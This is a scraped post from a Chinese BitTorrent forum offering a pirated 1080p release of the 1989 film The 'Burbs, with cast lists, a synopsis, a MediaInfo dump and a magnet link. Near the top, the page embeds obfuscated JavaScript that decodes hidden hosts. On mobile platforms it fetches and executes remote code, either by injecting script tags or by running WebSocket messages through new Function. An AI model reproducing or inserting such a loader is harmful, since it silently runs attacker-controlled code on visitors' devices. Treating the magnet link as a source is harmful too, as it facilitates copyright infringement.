地狱来的芳邻[中文字幕].The.Burbs.1989.1080p.BluRay.DD2.0.x265-10bit 11.06GB

版主小s 1月前 302

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDA2OQ==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x6b\x62\x74\x42\x4f\x58\x63\x64\x53\x4e']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxzZGtmai41MS10b3VyLm5ldCxodHRwczovL29zbGRramZsLmNoYYW95aTQuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 地狱来的芳邻 / 邻居 / 符碌敢死队 / 飞越古怪屋
◎片  名 The 'Burbs
◎年  代 1989
◎产  地 美国
◎类  别 喜剧 / 惊悚 / 恐怖
◎语  言 英语
◎上映日期 1989-02-17
◎IMDb链接 https://www.imdb.com/title/tt0096734/
◎豆瓣评分 6.7/10 (457人评价)
◎豆瓣链接 https://movie.douban.com/subject/1292918/
◎片  长 101 分钟
◎导  演 乔·丹特 Joe Dante (id:1036597)
◎编  剧 达纳·奥尔森 Dana Olsen (id:1444810)
◎演  员 汤姆·汉克斯 Tom Hanks (id:1054450)
       布鲁斯·邓恩 Bruce Dern (id:1019069)
       凯丽·费雪 Carrie Fisher (id:1027813)
       帕特里卡·达博 Patrika Darbo (id:1054850)
       迪克·米勒 Dick Miller (id:1016710)
       罗伯特·皮卡多 Robert Picardo (id:1055223)
       富兰克林·阿贾伊 Franklyn Ajaye (id:1045264)
       兰斯·霍华德 Rance Howard (id:1054335)
       希瑟·哈泽 Heather Haase (id:1088903)
       尼基·凯特 Nicky Katt (id:1048179)
       西奥多·戈特利布 Theodore Gottlieb (id:1152423)
       科里·丹齐格 Cory Danziger (id:1089430)
       盖尔·高登 Gale Gordon (id:1032318)
       达拉 Darla (id:1372817)
       里克·杜科蒙 Rick Ducommun (id:1090487)
       科里·费尔德曼 Corey Feldman (id:1009240)
       温迪·夏尔 Wendy Schaal (id:1143575)
       亨利·吉布森 Henry Gibson (id:1055515)
       考特尼·盖恩斯 Courtney Gains (id:1025275)
       Pat Kehoe Pat Kehoe (id:1288313)
       迈克尔·芬内尔 Michael Finnell (id:1283752)
       杰瑞·高德史密斯 Jerry Goldsmith (id:1007116)
       迈克·芬顿 Mike Fenton (id:1283570)
       朱迪·泰勒 Judy Taylor (id:1298995)
       约翰·H·安德森 John H. Anderson (id:1277210)
       詹姆斯·H·斯宾塞 James H. Spencer (id:1298136)
       罗珊娜·诺顿 Rosanna Norton (id:1293290)
       Christine Lee Christine Lee (id:1289649)
       迈克尔·杰曼 Michael Germain (id:1284741)
       布鲁斯·沃尔特斯 Bruce Walters (id:1300370)
       迈克尔·欧文斯 Michael Owens (id:1293758)
       Jim Morris Jim Morris (id:1292540)
       彼得·库兰 Peter Kuran (id:1289126)
       比尔·乔治 Bill George (id:1284713)

◎标  签 喜剧 / 美国 / 汤姆·汉克斯 / 惊悚 / 美国电影 / 1989 / TomHanks / 悬疑

◎简  介
  故事背景是乡下的一个社区,雷特别来到乡下享受一周假期,却发现新搬来的邻居古先生一家行踪怪异,经常昼伏夜出,屋子的气氛亦恐怖得有如鬼屋。此时恰好另一邻居华特先生神秘失踪,雷猜疑是否古做的好事?于是趁古家一家人外出时,亲自摸进古家内一探究竟……

  1. ##### MediaInfo ######
  2. General
  3. Unique ID                                : 264886238928159409244024094533270254282 (0xC7473BE38B168B8496DECF79688A32CA)
  4. Complete name                            : [email protected]v
  5. Format                                   : Matroska
  6. Format version                           : Version 4
  7. File size                                : 11.1 GiB
  8. Duration                                 : 1 h 41 min
  9. Overall bit rate                         : 15.6 Mb/s
  10. Movie name                               : The Burbs 1989 1080p BluRay DD2.0 [email protected]
  11. Encoded date                             : UTC 2021-08-30 05:50:12
  12. Writing application                      : mkvmerge v38.0.0 ('The Silent Type') 64-bit
  13. Writing library                          : libebml v1.3.9 + libmatroska v1.5.2
  14. Video
  15. ID                                       : 1
  16. Format                                   : HEVC
  17. Format/Info                              : High Efficiency Video Coding
  18. Format profile                           : Main [email protected]@High
  19. Codec ID                                 : V_MPEGH/ISO/HEVC
  20. Duration                                 : 1 h 41 min
  21. Bit rate                                 : 14.9 Mb/s
  22. Width                                    : 1 920 pixels
  23. Height                                   : 1 036 pixels
  24. Display aspect ratio                     : 1.85:1
  25. Frame rate mode                          : Constant
  26. Frame rate                               : 23.976 (24000/1001/53354) FPS
  27. Color space                              : YUV
  28. Chroma subsampling                       : 4:2:0
  29. Bit depth                                : 10 bits
  30. Bits/(Pixel*Frame)                       : 0.312
  31. Stream size                              : 10.6 GiB (96%)
  32. Title                                    : @HDSky
  33. Writing library                          : x265 - H.265/HEVC codec
  34. Default                                  : Yes
  35. Forced                                   : No
  36. Audio
  37. ID                                       : 2
  38. Format                                   : AC-3
  39. Format/Info                              : Audio Coding 3
  40. Commercial name                          : Dolby Digital
  41. Codec ID                                 : A_AC3
  42. Duration                                 : 1 h 41 min
  43. Bit rate mode                            : Constant
  44. Bit rate                                 : 640 kb/s
  45. Channel(s)                               : 2 channels
  46. Channel layout                           : L R
  47. Sampling rate                            : 48.0 kHz
  48. Frame rate                               : 31.250 FPS (1536 SPF)
  49. Compression mode                         : Lossy
  50. Stream size                              : 465 MiB (4%)
  51. Title                                    : English
  52. Language                                 : English
  53. Service kind                             : Complete Main
  54. Default                                  : Yes
  55. Forced                                   : No
  56. Text #1
  57. ID                                       : 3
  58. Format                                   : PGS
  59. Muxing mode                              : zlib
  60. Codec ID                                 : S_HDMV/PGS
  61. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  62. Duration                                 : 1 h 35 min
  63. Bit rate                                 : 38.0 kb/s
  64. Count of elements                        : 2246
  65. Stream size                              : 26.0 MiB (0%)
  66. Title                                    : CHS
  67. Language                                 : Chinese
  68. Default                                  : Yes
  69. Forced                                   : No
  70. Text #2
  71. ID                                       : 4
  72. Format                                   : PGS
  73. Muxing mode                              : zlib
  74. Codec ID                                 : S_HDMV/PGS
  75. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  76. Duration                                 : 1 h 35 min
  77. Bit rate                                 : 39.3 kb/s
  78. Count of elements                        : 2246
  79. Stream size                              : 26.9 MiB (0%)
  80. Title                                    : CHT
  81. Language                                 : Chinese
  82. Default                                  : No
  83. Forced                                   : No
  84. Menu
  85. 00:00:00.000                             : en:Chapter 01
  86. 00:08:42.313                             : en:Chapter 02
  87. 00:16:23.524                             : en:Chapter 03
  88. 00:25:19.810                             : en:Chapter 04
  89. 00:33:24.002                             : en:Chapter 05
  90. 00:41:07.423                             : en:Chapter 06
  91. 00:51:22.746                             : en:Chapter 07
  92. 01:00:10.398                             : en:Chapter 08
  93. 01:08:27.478                             : en:Chapter 09
  94. 01:14:20.790                             : en:Chapter 10
  95. 01:22:26.984                             : en:Chapter 11
  96. 01:32:51.024                             : en:Chapter 12


TAGS 惊悚 恐怖 喜剧

磁力链:
  • magnet:?xt=urn:btih:B8BE9D3EAFF51D792564FA7F2FACC11167C93814
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖